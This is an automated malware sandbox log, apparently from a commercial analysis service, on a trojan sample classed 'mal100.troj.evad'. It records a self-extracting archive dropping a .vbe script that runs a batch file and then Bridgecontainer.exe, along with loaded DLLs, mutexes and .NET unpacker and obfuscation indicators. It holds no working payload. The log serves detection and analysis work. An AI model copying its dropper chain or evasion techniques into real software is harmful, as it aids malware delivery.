Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005A3A3C	0_2_005A3A3C
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005B0B43	0_2_005B0B43
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005BCB60	0_2_005BCB60
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005A5C77	0_2_005A5C77
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005A3D6D	0_2_005A3D6D
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_0059ED14	0_2_0059ED14
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005AFDFA	0_2_005AFDFA
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_0059DE6C	0_2_0059DE6C
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_0059BE13	0_2_0059BE13
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005B0F78	0_2_005B0F78
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_00595F3C	0_2_00595F3C
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F133B0	5_2_00007FF848F133B0
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F1AEED	5_2_00007FF848F1AEED
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F1B075	5_2_00007FF848F1B075
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F1CF88	5_2_00007FF848F1CF88
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F1B070	5_2_00007FF848F1B070
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F1C9D8	5_2_00007FF848F1C9D8
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F1A037	5_2_00007FF848F1A037
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F12C18	5_2_00007FF848F12C18
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F1A037	5_2_00007FF848F1A037
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F12C18	5_2_00007FF848F12C18

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: String function: 005AED00 appears 31 times
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: String function: 005AE28C appears 35 times
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: String function: 005AE360 appears 52 times

Source: Bridgecontainer.exe.0.dr

Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: 5Ixz5yVfS7.exe, 00000000.00000003.2002063608.00000000074BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5Ixz5yVfS7.exe
Source: 5Ixz5yVfS7.exe, 00000000.00000003.2001173301.0000000006A82000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5Ixz5yVfS7.exe
Source: 5Ixz5yVfS7.exe, 00000000.00000003.2001688992.000000000739C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5Ixz5yVfS7.exe
Source: 5Ixz5yVfS7.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5Ixz5yVfS7.exe

Source: 5Ixz5yVfS7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, h0MFPwm6TZOLNcOO3SR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, h0MFPwm6TZOLNcOO3SR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, XXuCjlVleq6FGUqy7MQ.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, XXuCjlVleq6FGUqy7MQ.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, h0MFPwm6TZOLNcOO3SR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, h0MFPwm6TZOLNcOO3SR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, XXuCjlVleq6FGUqy7MQ.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, XXuCjlVleq6FGUqy7MQ.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, wAcUSUDELR6kZtl0aTO.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, wAcUSUDELR6kZtl0aTO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, wAcUSUDELR6kZtl0aTO.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, wAcUSUDELR6kZtl0aTO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 5Ixz5yVfS7.exe, 00000000.00000002.2006257651.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, 5Ixz5yVfS7.exe, 00000000.00000003.2005513162.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: N5OHKOq3jR1X.vbp

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/3@1/1

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: 0_2_00596EC9 GetLastError,FormatMessageW,

0_2_00596EC9

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: 0_2_005A9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_005A9E1C

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\605c0baeda0702fc271102fdb526c6b0fef151cc

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

File created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" "

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Command line argument: sfxname	0_2_005AD5D4
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Command line argument: sfxstime	0_2_005AD5D4
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Command line argument: STARTDLG	0_2_005AD5D4
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Command line argument: xj^	0_2_005AD5D4

Source: 5Ixz5yVfS7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5Ixz5yVfS7.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5Ixz5yVfS7.exe	ReversingLabs: Detection: 68%
Source: 5Ixz5yVfS7.exe	Virustotal: Detection: 57%

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

File read: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\5Ixz5yVfS7.exe "C:\Users\user\Desktop\5Ixz5yVfS7.exe"
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe"
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe"	Jump to behavior

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Section loaded: midimap.dll	Jump to behavior

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 5Ixz5yVfS7.exe

Static file information: File size 1164920 > 1048576

Source: 5Ixz5yVfS7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 5Ixz5yVfS7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 5Ixz5yVfS7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 5Ixz5yVfS7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5Ixz5yVfS7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 5Ixz5yVfS7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 5Ixz5yVfS7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 5Ixz5yVfS7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 5Ixz5yVfS7.exe

Source: 5Ixz5yVfS7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5Ixz5yVfS7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5Ixz5yVfS7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5Ixz5yVfS7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5Ixz5yVfS7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, h0MFPwm6TZOLNcOO3SR.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, h0MFPwm6TZOLNcOO3SR.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, TphSWr5eY0phEnDdXEe.cs	.Net Code: dcKDIaQJMx System.AppDomain.Load(byte[])
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, TphSWr5eY0phEnDdXEe.cs	.Net Code: dcKDIaQJMx System.Reflection.Assembly.Load(byte[])
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, TphSWr5eY0phEnDdXEe.cs	.Net Code: dcKDIaQJMx
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, TphSWr5eY0phEnDdXEe.cs	.Net Code: dcKDIaQJMx System.AppDomain.Load(byte[])
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, TphSWr5eY0phEnDdXEe.cs	.Net Code: dcKDIaQJMx System.Reflection.Assembly.Load(byte[])
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, TphSWr5eY0phEnDdXEe.cs	.Net Code: dcKDIaQJMx

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

File created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\__tmp_rar_sfx_access_check_7222078

Jump to behavior

Source: 5Ixz5yVfS7.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005AE28C push eax; ret	0_2_005AE2AA
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005AED46 push ecx; ret	0_2_005AED59
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F1B075 pushad ; ret	5_2_00007FF848F1B139
